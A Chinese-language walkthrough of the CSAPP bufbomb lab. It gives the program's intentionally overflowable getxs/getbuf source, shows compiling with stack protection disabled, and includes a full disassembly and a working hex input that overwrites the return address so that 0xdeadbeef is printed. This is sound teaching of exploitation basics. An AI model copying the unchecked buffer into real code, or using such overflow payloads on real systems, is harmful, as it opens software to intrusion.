1. 获得bufbomb.c
/* code for bufbomb.c */
C语言: 高亮代码由发芽网提供
01
/* Bomb program that is solved using a buffer overflow attack */
02
03
#include
04
#include
05
#include
06
07
/* Like gets, except that characters are typed as pairs of hex digits.
08
Nondigit characters are ignored. Stops when encounters newline */
09
char
*
getxs(
char
*
dest)
10
{
11
int
c;
12
int
even
=
1;
/* Have read even number of digits */
13
int
otherd
=
0;
/* Other hex digit of pair */
14
char
*sp
=
dest;
15
while ((
c
=
getchar())
!=
EOF
&&
c
!=
'\n')
{
16
if (
isxdigit(
c))
{
17
int
val;
18
if (
'0'
<=
c
&&
c
<=
'9')
19
val
=
c
-
'0';
20
else
if (
'A'
<=
c
&&
c
<=
'F')
21
val
=
c
-
'A'
+
10;
22
else
23
val
=
c
-
'a'
+
10;
24
if (
even)
{
25
otherd
=
val;
26
even
=
0;
27
}
else
{
28
*sp
++
=
otherd
*
16
+
val;
29
even
=
1;
30
}
31
}
32
}
33
*sp
++
=
'\0';
34
return
dest;
35
}
36
37
/* $begin getbuf-c */
38
int
getbuf()
39
{
40
char
buf
[
12
];
41
getxs(
buf);
42
return
1;
43
}
44
45
void
test()
46
{
47
int
val;
48
int
array
[
1
];
49
printf(
"Local variable at %p
\n
"
,
array);
50
printf(
"Type Hex string:");
51
val
=
getbuf();
52
printf(
"getbuf returned 0x%x
\n
"
,
val);
53
}
54
/* $end getbuf-c */
55
56
int
main()
57
{
58
59
int
buf
[
16
];
60
/* This little hack is an attempt to get the stack to be in a
61
stable position. By experiment, found that position of stack
62
varies by one program execution to the next, but only in the low
63
order 23 bits.
64
*/
65
int
offset
= (((
int)
buf)
&
0x7FFFFF);
66
int
*
space
= (
int
*)
alloca(
offset);
67
*
space
=
0;
/* So that don't get complaint of unused variable */
68
printf(
"Added offset 0x%x, should move stack to around %p
\n
"
,
69
offset
, (
char
*)
buf
-
offset);
70
test();
71
return
0;
72
}
2. 查看gcc版本
gcc --version
自GCC-4.1.0之后,就在编译过程中加入了防溢出的随机数验证的堆栈保护机制(默认启用)。
我的gcc版本是4.4.3,显然默认启用了堆栈保护机制,故编译bufbomb.c时需要关闭堆栈保护机制。
3. 关闭堆栈保护机制进行编译(使用-fno-stack-protector编译选项)。
gcc -o bufbomb bufbomb.c -fno-stack-protector
切记,不要使用优化选项,如-O2等。否则得不到后面的结果。
4. 反汇编bufbomb
objdump -d bufbomb > NP_bufbomb.s
使用NP_bufbomb.s是为了表明No stack Protector, :-)
/* code for NP_bufbomb.s */
GAS语言: 高亮代码由发芽网提供
bufbomb:
file
format
elf32
-
i386
Disassembly
of
section
.init
:
08048328
<
_init
>
:
8048328:
55
push
%ebp
8048329:
89
e5
mov
%esp
,
%ebp
804832
b:
53
push
%ebx
804832
c:
83
ec
04
sub
$0x4
,
%esp
804832
f:
e8
00
00
00
00
call
8048334
<
_init
+
0xc
>
8048334:
5b
pop
%ebx
8048335:
81
c3
c0
1
c
00
00
add
$0x1cc0
,
%ebx
804833
b:
8b
93
fc
ff
ff
ff
mov
-
0x4(
%ebx
),
%edx
8048341:
85
d2
test
%edx
,
%edx
8048343:
74
05
je
804834a
<
_init
+
0x22
>
8048345:
e8
2
e
00
00
00
call
8048378
<
__gmon_start__@plt
>
804834
a:
e8
01
01
00
00
call
8048450
<
frame_dummy
>
804834
f:
e8
3
c
03
00
00
call
8048690
<
__do_global_ctors_aux
>
8048354:
58
pop
%eax
8048355:
5b
pop
%ebx
8048356:
c9
leave
8048357
:
c3
ret
Disassembly
of
section
.plt
:
08048358
<
getchar@plt
-
0x10
>
:
8048358:
ff
35
f8
9
f
04
08
pushl
0x8049ff8
804835
e:
ff
25
fc
9
f
04
08
jmp
*
0x8049ffc
8048364:
00
00
add
%al
,(
%eax)
...
08048368
<
getchar@plt
>
:
8048368:
ff
25
00
a0
04
08
jmp
*
0x804a000
804836
e:
68
00
00
00
00
push
$0x0
8048373:
e9
e0
ff
ff
ff
jmp
8048358
<
_init
+
0x30
>
08048378
<
__gmon_start__@plt
>
:
8048378:
ff
25
04
a0
04
08
jmp
*
0x804a004
804837
e:
68
08
00
00
00
push
$0x8
8048383:
e9
d0
ff
ff
ff
jmp
8048358
<
_init
+
0x30
>
08048388
<
__libc_start_main@plt
>
:
8048388:
ff
25
08
a0
04
08
jmp
*
0x804a008
804838
e:
68
10
00
00
00
push
$0x10
8048393:
e9
c0
ff
ff
ff
jmp
8048358
<
_init
+
0x30
>
08048398
<
__ctype_b_loc@plt
>
:
8048398:
ff
25
0
c
a0
04
08
jmp
*
0x804a00c
804839
e:
68
18
00
00
00
push
$0x18
80483
a3:
e9
b0
ff
ff
ff
jmp
8048358
<
_init
+
0x30
>
080483
a8
<
printf@plt
>
:
80483
a8:
ff
25
10
a0
04
08
jmp
*
0x804a010
80483
ae:
68
20
00
00
00
push
$0x20
80483
b3:
e9
a0
ff
ff
ff
jmp
8048358
<
_init
+
0x30
>
Disassembly
of
section
.text
:
080483
c0
<
_start
>
:
80483
c0:
31
ed
xor
%ebp
,
%ebp
80483
c2:
5
e
pop
%esi
80483
c3:
89
e1
mov
%esp
,
%ecx
80483
c5:
83
e4
f0
and
$0xfffffff0
,
%esp
80483
c8:
50
push
%eax
80483
c9:
54
push
%esp
80483
ca:
52
push
%edx
80483
cb:
68
20
86
04
08
push
$0x8048620
80483
d0:
68
30
86
04
08
push
$0x8048630
80483
d5:
51
push
%ecx
80483
d6:
56
push
%esi
80483
d7:
68
a0
85
04
08
push
$0x80485a0
80483
dc:
e8
a7
ff
ff
ff
call
8048388
<
__libc_start_main@plt
>
80483
e1:
f4
hlt
80483
e2
:
90
nop
80483
e3:
90
nop
80483
e4:
90
nop
80483
e5:
90
nop
80483
e6:
90
nop
80483
e7:
90
nop
80483
e8:
90
nop
80483
e9:
90
nop
80483
ea:
90
nop
80483
eb:
90
nop
80483
ec:
90
nop
80483
ed:
90
nop
80483
ee:
90
nop
80483
ef:
90
nop
080483
f0
<
__do_global_dtors_aux
>
:
80483
f0:
55
push
%ebp
80483
f1:
89
e5
mov
%esp
,
%ebp
80483
f3:
53
push
%ebx
80483
f4:
83
ec
04
sub
$0x4
,
%esp
80483
f7:
80
3
d
1
c
a0
04
08
00
cmpb
$0x0
,
0x804a01c
80483
fe:
75
3
f
jne
804843f
<
__do_global_dtors_aux
+
0x4f
>
8048400:
a1
20
a0
04
08
mov
0x804a020
,
%eax
8048405: bb
18
9
f
04
08
mov
$0x8049f18
,
%ebx
804840
a:
81
eb
14
9
f
04
08
sub
$0x8049f14
,
%ebx
8048410:
c1
fb
02
sar
$0x2
,
%ebx
8048413:
83
eb
01
sub
$0x1
,
%ebx
8048416:
39
d8
cmp
%ebx
,
%eax
8048418:
73
1
e
jae
8048438
<
__do_global_dtors_aux
+
0x48
>
804841
a:
8
d
b6
00
00
00
00
lea
0x0(
%esi
),
%esi
8048420:
83
c0
01
add
$0x1
,
%eax
8048423:
a3
20
a0
04
08
mov
%eax
,
0x804a020
8048428:
ff
14
85
14
9
f
04
08
call
*
0x8049f14
(,
%eax
,
4)
804842
f:
a1
20
a0
04
08
mov
0x804a020
,
%eax
8048434:
39
d8
cmp
%ebx
,
%eax
8048436:
72
e8
jb
8048420
<
__do_global_dtors_aux
+
0x30
>
8048438:
c6
05
1
c
a0
04
08
01
movb
$0x1
,
0x804a01c
804843
f:
83
c4
04
add
$0x4
,
%esp
8048442:
5b
pop
%ebx
8048443:
5
d
pop
%ebp
8048444:
c3
ret
8048445
:
8
d
74
26
00
lea
0x0(
%esi
,
%eiz
,
1
),
%esi
8048449:
8
d
bc
27
00
00
00
00
lea
0x0(
%edi
,
%eiz
,
1
),
%edi
08048450
<
frame_dummy
>
:
8048450:
55
push
%ebp
8048451:
89
e5
mov
%esp
,
%ebp
8048453:
83
ec
18
sub
$0x18
,
%esp
8048456:
a1
1
c
9
f
04
08
mov
0x8049f1c
,
%eax
804845
b:
85
c0
test
%eax
,
%eax
804845
d:
74
12
je
8048471
<
frame_dummy
+
0x21
>
804845
f:
b8
00
00
00
00
mov
$0x0
,
%eax
8048464:
85
c0
test
%eax
,
%eax
8048466:
74
09
je
8048471
<
frame_dummy
+
0x21
>
8048468:
c7
04
24
1
c
9
f
04
08
movl
$0x8049f1c
,(
%esp)
804846
f:
ff
d0
call
*
%eax
8048471:
c9
leave
8048472
:
c3
ret
8048473
:
90
nop
08048474
<
getxs
>
:
8048474:
55
push
%ebp
8048475:
89
e5
mov
%esp
,
%ebp
8048477:
83
ec
28
sub
$0x28
,
%esp
804847
a:
c7
45
e8
01
00
00
00
movl
$0x1
,-
0x18(
%ebp)
8048481:
c7
45
ec
00
00
00
00
movl
$0x0
,-
0x14(
%ebp)
8048488:
8b
45
08
mov
0x8(
%ebp
),
%eax
804848
b:
89
45
f0
mov
%eax
,-
0x10(
%ebp)
804848
e:
e9
89
00
00
00
jmp
804851c
<
getxs
+
0xa8
>
8048493:
e8
00
ff
ff
ff
call
8048398
<
__ctype_b_loc@plt
>
8048498:
8b
00
mov (
%eax
),
%eax
804849
a:
8b
55
e4
mov
-
0x1c(
%ebp
),
%edx
804849
d:
01
d2
add
%edx
,
%edx
804849
f:
01
d0
add
%edx
,
%eax
80484
a1:
0
f
b7
00
movzwl (
%eax
),
%eax
80484
a4:
0
f
b7
c0
movzwl
%ax
,
%eax
80484
a7:
25
00
10
00
00
and
$0x1000
,
%eax
80484
ac:
85
c0
test
%eax
,
%eax
80484
ae:
74
6
c
je
804851c
<
getxs
+
0xa8
>
80484
b0:
83
7
d
e4
2
f
cmpl
$0x2f
,-
0x1c(
%ebp)
80484
b4:
7
e
11
jle
80484c7
<
getxs
+
0x53
>
80484
b6:
83
7
d
e4
39
cmpl
$0x39
,-
0x1c(
%ebp)
80484
ba:
7
f
0b
jg
80484c7
<
getxs
+
0x53
>
80484
bc:
8b
45
e4
mov
-
0x1c(
%ebp
),
%eax
80484
bf:
83
e8
30
sub
$0x30
,
%eax
80484
c2:
89
45
f4
mov
%eax
,-
0xc(
%ebp)
80484
c5:
eb
20
jmp
80484e7
<
getxs
+
0x73
>
80484
c7:
83
7
d
e4
40
cmpl
$0x40
,-
0x1c(
%ebp)
80484
cb:
7
e
11
jle
80484de
<
getxs
+
0x6a
>
80484
cd:
83
7
d
e4
46
cmpl
$0x46
,-
0x1c(
%ebp)
80484
d1:
7
f
0b
jg
80484de
<
getxs
+
0x6a
>
80484
d3:
8b
45
e4
mov
-
0x1c(
%ebp
),
%eax
80484
d6:
83
e8
37
sub
$0x37
,
%eax
80484
d9:
89
45
f4
mov
%eax
,-
0xc(
%ebp)
80484
dc:
eb
09
jmp
80484e7
<
getxs
+
0x73
>
80484
de:
8b
45
e4
mov
-
0x1c(
%ebp
),
%eax
80484
e1:
83
e8
57
sub
$0x57
,
%eax
80484
e4:
89
45
f4
mov
%eax
,-
0xc(
%ebp)
80484
e7:
83
7
d
e8
00
cmpl
$0x0
,-
0x18(
%ebp)
80484
eb:
74
0
f
je
80484fc
<
getxs
+
0x88
>
80484
ed:
8b
45
f4
mov
-
0xc(
%ebp
),
%eax
80484
f0:
89
45
ec
mov
%eax
,-
0x14(
%ebp)
80484
f3:
c7
45
e8
00
00
00
00
movl
$0x0
,-
0x18(
%ebp)
80484
fa:
eb
20
jmp
804851c
<
getxs
+
0xa8
>
80484
fc:
8b
45
ec
mov
-
0x14(
%ebp
),
%eax
80484
ff:
89
c2
mov
%eax
,
%edx
8048501:
c1
e2
04
shl
$0x4
,
%edx
8048504:
8b
45
f4
mov
-
0xc(
%ebp
),
%eax
8048507:
8
d
04
02
lea (
%edx
,
%eax
,
1
),
%eax
804850
a:
89
c2
mov
%eax
,
%edx
804850
c:
8b
45
f0
mov
-
0x10(
%ebp
),
%eax
804850
f:
88
10
mov
%dl
,(
%eax)
8048511:
83
45
f0
01
addl
$0x1
,-
0x10(
%ebp)
8048515:
c7
45
e8
01
00
00
00
movl
$0x1
,-
0x18(
%ebp)
804851
c:
e8
47
fe
ff
ff
call
8048368
<
getchar@plt
>
8048521:
89
45
e4
mov
%eax
,-
0x1c(
%ebp)
8048524:
83
7
d
e4
ff
cmpl
$0xffffffff
,-
0x1c(
%ebp)
8048528:
74
0
a
je
8048534
<
getxs
+
0xc0
>
804852
a:
83
7
d
e4
0
a
cmpl
$0xa
,-
0x1c(
%ebp)
804852
e:
0
f
85
5
f
ff
ff
ff
jne
8048493
<
getxs
+
0x1f
>
8048534:
8b
45
f0
mov
-
0x10(
%ebp
),
%eax
8048537:
c6
00
00
movb
$0x0
,(
%eax)
804853
a:
83
45
f0
01
addl
$0x1
,-
0x10(
%ebp)
804853
e:
8b
45
08
mov
0x8(
%ebp
),
%eax
8048541:
c9
leave
8048542
:
c3
ret
08048543
<
getbuf
>:
8048543:
55
push
%ebp
8048544:
89
e5
mov
%esp
,
%ebp
8048546:
83
ec
28
sub
$0x28
,
%esp
8048549:
8
d
45
ec
lea
-
0x14(
%ebp
),
%eax
804854
c:
89
04
24
mov
%eax
,(
%esp)
804854
f:
e8
20
ff
ff
ff
call
8048474
<
getxs
>
8048554:
b8
01
00
00
00
mov
$0x1
,
%eax
8048559:
c9
leave
804855
a
:
c3
ret
0804855b
<
test
>:
804855
b:
55
push
%ebp
804855
c:
89
e5
mov
%esp
,
%ebp
804855
e:
83
ec
28
sub
$0x28
,
%esp
8048561:
b8
e0
86
04
08
mov
$0x80486e0
,
%eax
8048566:
8
d
55
f0
lea
-
0x10(
%ebp
),
%edx
8048569:
89
54
24
04
mov
%edx
,
0x4(
%esp)
804856
d:
89
04
24
mov
%eax
,(
%esp)
8048570:
e8
33
fe
ff
ff
call
80483a8
<
printf@plt
>
8048575:
b8
f6
86
04
08
mov
$0x80486f6
,
%eax
804857
a:
89
04
24
mov
%eax
,(
%esp)
804857
d:
e8
26
fe
ff
ff
call
80483a8
<
printf@plt
>
8048582:
e8
bc
ff
ff
ff
call
8048543
<
getbuf
>
8048587:
89
45
f4
mov
%eax
,-
0xc(
%ebp)
804858
a:
b8
07
87
04
08
mov
$0x8048707
,
%eax
804858
f:
8b
55
f4
mov
-
0xc(
%ebp
),
%edx
8048592:
89
54
24
04
mov
%edx
,
0x4(
%esp)
8048596:
89
04
24
mov
%eax
,(
%esp)
8048599:
e8
0
a
fe
ff
ff
call
80483a8
<
printf@plt
>
804859
e:
c9
leave
804859
f
:
c3
ret
080485a0
<
main
>:
80485
a0:
8
d
4
c
24
04
lea
0x4(
%esp
),
%ecx
80485
a4:
83
e4
f0
and
$0xfffffff0
,
%esp
80485
a7:
ff
71
fc
pushl
-
0x4(
%ecx)
80485
aa:
55
push
%ebp
80485
ab:
89
e5
mov
%esp
,
%ebp
80485
ad:
51
push
%ecx
80485
ae:
83
ec
64
sub
$0x64
,
%esp
80485
b1:
8
d
45
b0
lea
-
0x50(
%ebp
),
%eax
80485
b4:
25
ff
ff
7
f
00
and
$0x7fffff
,
%eax
80485
b9:
89
45
f0
mov
%eax
,-
0x10(
%ebp)
80485
bc:
8b
45
f0
mov
-
0x10(
%ebp
),
%eax
80485
bf:
83
c0
0
f
add
$0xf
,
%eax
80485
c2:
83
c0
0
f
add
$0xf
,
%eax
80485
c5:
c1
e8
04
shr
$0x4
,
%eax
80485
c8:
c1
e0
04
shl
$0x4
,
%eax
80485
cb:
29
c4
sub
%eax
,
%esp
80485
cd:
8
d
44
24
0
c
lea
0xc(
%esp
),
%eax
80485
d1:
83
c0
0
f
add
$0xf
,
%eax
80485
d4:
c1
e8
04
shr
$0x4
,
%eax
80485
d7:
c1
e0
04
shl
$0x4
,
%eax
80485
da:
89
45
f4
mov
%eax
,-
0xc(
%ebp)
80485
dd:
8b
45
f4
mov
-
0xc(
%ebp
),
%eax
80485
e0:
c7
00
00
00
00
00
movl
$0x0
,(
%eax)
80485
e6:
8
d
45
b0
lea
-
0x50(
%ebp
),
%eax
80485
e9:
8b
55
f0
mov
-
0x10(
%ebp
),
%edx
80485
ec:
f7
da
neg
%edx
80485
ee:
8
d
14
10
lea (
%eax
,
%edx
,
1
),
%edx
80485
f1:
b8
20
87
04
08
mov
$0x8048720
,
%eax
80485
f6:
89
54
24
08
mov
%edx
,
0x8(
%esp)
80485
fa:
8b
55
f0
mov
-
0x10(
%ebp
),
%edx
80485
fd:
89
54
24
04
mov
%edx
,
0x4(
%esp)
8048601:
89
04
24
mov
%eax
,(
%esp)
8048604:
e8
9
f
fd
ff
ff
call
80483a8
<
printf@plt
>
8048609:
e8
4
d
ff
ff
ff
call
804855b
<
test
>
804860
e:
b8
00
00
00
00
mov
$0x0
,
%eax
8048613:
8b
4
d
fc
mov
-
0x4(
%ebp
),
%ecx
8048616:
c9
leave
8048617
:
8
d
61
fc
lea
-
0x4(
%ecx
),
%esp
804861
a:
c3
ret
804861b
:
90
nop
804861
c:
90
nop
804861
d:
90
nop
804861
e:
90
nop
804861
f:
90
nop
08048620
<
__libc_csu_fini
>
:
8048620:
55
push
%ebp
8048621:
89
e5
mov
%esp
,
%ebp
8048623:
5
d
pop
%ebp
8048624:
c3
ret
8048625
:
8
d
74
26
00
lea
0x0(
%esi
,
%eiz
,
1
),
%esi
8048629:
8
d
bc
27
00
00
00
00
lea
0x0(
%edi
,
%eiz
,
1
),
%edi
08048630
<
__libc_csu_init
>
:
8048630:
55
push
%ebp
8048631:
89
e5
mov
%esp
,
%ebp
8048633:
57
push
%edi
8048634:
56
push
%esi
8048635:
53
push
%ebx
8048636:
e8
4
f
00
00
00
call
804868a
<
__i686.get_pc_thunk.bx
>
804863
b:
81
c3
b9
19
00
00
add
$0x19b9
,
%ebx
8048641:
83
ec
1
c
sub
$0x1c
,
%esp
8048644:
e8
df
fc
ff
ff
call
8048328
<
_init
>
8048649:
8
d bb
18
ff
ff
ff
lea
-
0xe8(
%ebx
),
%edi
804864
f:
8
d
83
18
ff
ff
ff
lea
-
0xe8(
%ebx
),
%eax
8048655:
29
c7
sub
%eax
,
%edi
8048657:
c1
ff
02
sar
$0x2
,
%edi
804865
a:
85
ff
test
%edi
,
%edi
804865
c:
74
24
je
8048682
<
__libc_csu_init
+
0x52
>
804865
e:
31
f6
xor
%esi
,
%esi
8048660:
8b
45
10
mov
0x10(
%ebp
),
%eax
8048663:
89
44
24
08
mov
%eax
,
0x8(
%esp)
8048667:
8b
45
0
c
mov
0xc(
%ebp
),
%eax
804866
a:
89
44
24
04
mov
%eax
,
0x4(
%esp)
804866
e:
8b
45
08
mov
0x8(
%ebp
),
%eax
8048671:
89
04
24
mov
%eax
,(
%esp)
8048674:
ff
94
b3
18
ff
ff
ff
call
*-
0xe8(
%ebx
,
%esi
,
4)
804867
b:
83
c6
01
add
$0x1
,
%esi
804867
e:
39
fe
cmp
%edi
,
%esi
8048680:
72
de
jb
8048660
<
__libc_csu_init
+
0x30
>
8048682:
83
c4
1
c
add
$0x1c
,
%esp
8048685:
5b
pop
%ebx
8048686:
5
e
pop
%esi
8048687:
5
f
pop
%edi
8048688:
5
d
pop
%ebp
8048689:
c3
ret
0804868a
<
__i686.get_pc_thunk.bx
>:
804868
a:
8b
1
c
24
mov (
%esp
),
%ebx
804868
d:
c3
ret
804868
e
:
90
nop
804868
f:
90
nop
08048690
<
__do_global_ctors_aux
>
:
8048690:
55
push
%ebp
8048691:
89
e5
mov
%esp
,
%ebp
8048693:
53
push
%ebx
8048694:
83
ec
04
sub
$0x4
,
%esp
8048697:
a1
0
c
9
f
04
08
mov
0x8049f0c
,
%eax
804869
c:
83
f8
ff
cmp
$0xffffffff
,
%eax
804869
f:
74
13
je
80486b4
<
__do_global_ctors_aux
+
0x24
>
80486
a1: bb
0
c
9
f
04
08
mov
$0x8049f0c
,
%ebx
80486
a6:
66
90
xchg
%ax
,
%ax
80486
a8:
83
eb
04
sub
$0x4
,
%ebx
80486
ab:
ff
d0
call
*
%eax
80486
ad:
8b
03
mov (
%ebx
),
%eax
80486
af:
83
f8
ff
cmp
$0xffffffff
,
%eax
80486
b2:
75
f4
jne
80486a8
<
__do_global_ctors_aux
+
0x18
>
80486
b4:
83
c4
04
add
$0x4
,
%esp
80486
b7:
5b
pop
%ebx
80486
b8:
5
d
pop
%ebp
80486
b9:
c3
ret
80486
ba
:
90
nop
80486
bb:
90
nop
Disassembly
of
section
.fini
:
080486
bc
<
_fini
>
:
80486
bc:
55
push
%ebp
80486
bd:
89
e5
mov
%esp
,
%ebp
80486
bf:
53
push
%ebx
80486
c0:
83
ec
04
sub
$0x4
,
%esp
80486
c3:
e8
00
00
00
00
call
80486c8
<
_fini
+
0xc
>
80486
c8:
5b
pop
%ebx
80486
c9:
81
c3
2
c
19
00
00
add
$0x192c
,
%ebx
80486
cf:
e8
1
c
fd
ff
ff
call
80483f0
<
__do_global_dtors_aux
>
80486
d4:
59
pop
%ecx
80486
d5:
5b
pop
%ebx
80486
d6:
c9
leave
80486
d7
:
c3
ret
5. 由于我们的任务是,只简单地对提示符输入一个适当的十六进制字符串,就使getbuf对test返回-559038737(0xdeadbeef)。
所以我们输入的串只要覆盖到val所在的内存单元的位置即可。
1. 通过分析NP_bufbomb.s得到各个过程的栈帧布局,getbuf的返回地址,test中call printf的地址和"getbuf returned 0x%x\n"的地址。
2. 通过使用gdb调试bufbomb得到数组buf的起始地址(注意不是buf的地址!)和test的栈帧地址。
注: 函数参数的地址可根据调用函数前的入栈情况获得(汇编调用C标准库函数都是通过栈来传递参数的);
栈帧的地址可通过在调试程序时的相应位置使用print /x $ebp获得。
执行getxs时内存中各个过程的栈帧布局
(仅仅画出了关键的test,getbuf以及getxs的栈帧布局,以及一些必要的单元里的内容):
/* there is a picture of stack frame */
6. 分析完毕得到输入串,运行bufbomb,并输入数据:
01 02 03 04 05 06 07 08 09 10 11 12 01 02 03 04 05 06 07 08 c8 ff 7f bf 99 85 04 08 07 87 04 08 ef be ad de
运行结果:
有图由真相
/* there is a picture of result */
关于输入数据的解释:
前12个(01 02 03 04 05 06 07 08 09 10 11 12)存到buf[0]~buf[11]中。这里的数组buf是getbuf中的,而不是main中的!
接着的8个(01 02 03 04 05 06 07 08)存到编译器为数组buf多开辟的8个字节中(一般情况下,编译器总是开辟比需要的多一点的空间)。
接下来的c8 ff 7f bf,是test的栈帧指针(0xbf7fffc8)。
然后的99 85 04 08,是新的getbuf的返回地址也是test中最后一个call printf的地址(0x08048599)。其实只要跳过对val的赋值过程即可,这个值不唯一,也可以是0x0804858a。(这个地址跳过了程序用getbuf的返回值0x1修改栈中val所在内存里的值,从而使printf的参数栈中val的内容是我们所输入的0xdeadbeef,当然存储"getbuf returned 0x%x\n"地址的内存单元还是用原值覆盖)
最后的ef be ad de,是我们要得到的输出值(0xdeadbeef)。
!!!一些强调:
自GCC-4.1.0之后,就在编译过程中加入了防溢出的随机数验证机制,在%gs:0x14 中保存一个随机数,用此进行比对,验证溢出与否。同时GCC-4.1.0之后还加入了与溢出有关的几个编译选项,以此控制是否添加溢出验证:
-fstack-protector:启用堆栈保护,不过只为局部变量中含有 char 数组的函数插入保护代码。
-fstack-protector-all:启用堆栈保护,为所有函数插入保护代码。
-fno-stack-protector:禁用堆栈保护。
输入值必须为两个数字或字母(十六进制允许范围内)一组。(注意源程序中even number,偶数的意思)
注意1:注意输入值与其所在内存中的对应关系(我们输入的值是从低到高进入内存的,按字节(由char buf[12]和getxs决定))!,根据getxs可知,输入的值都会被作为十六进制,如bf被作为0xbf
注意2:前20个输入,只要是两个一组即可。(也就是前20个输入只要符合getxs函数的要求即可!)
切记切记,该实验是非常依赖机器和编译选项的!
自己实验时,最要注意的是关闭堆栈保护机制(不关闭堆栈保护机制,在gdb中得到结果,不算本事,我几分钟就可以搞定!)。
还有就是一定要使用"objdump -d bufbomb > bufbomb.s"得到bufbomb的反汇编代码。
通过分析bufbomb.s得到栈帧的布局,以及一些必要的地址数据(getbuf的返回地址(需要修改以跳过将getbuf的返回值放到堆栈的指令)和"getbuf returned 0x%x\n"的地址)。再者就是要通过gdb获得数组buf的起始地址(注意不是buf的地址!)和test的栈帧地址。
思维扩展:
1. 关于gcc堆栈保护机制,以及%gs:0x14内容的随机性和不可访问性!
2. 关于对关闭和启用gcc堆栈保护机制对生成代码的影响。
3. 如何找出程序中潜在的缓冲区溢出漏洞(现实中往往得不到源程序)。
4. 如何利用程序中的缓冲区溢出漏洞,做一些高级攻击,如植入恶意代码等。
5. 如何防止程序中出现缓冲区溢出漏洞。
最后引用CSAPP里的原话:“我们不能原谅任何用这种或其他任何方法来获得对系统的未被授权的访问。未经许可闯入计算机系统与闯入一幢建筑是一样的——犯罪行为,即使犯罪者并没有恶意。”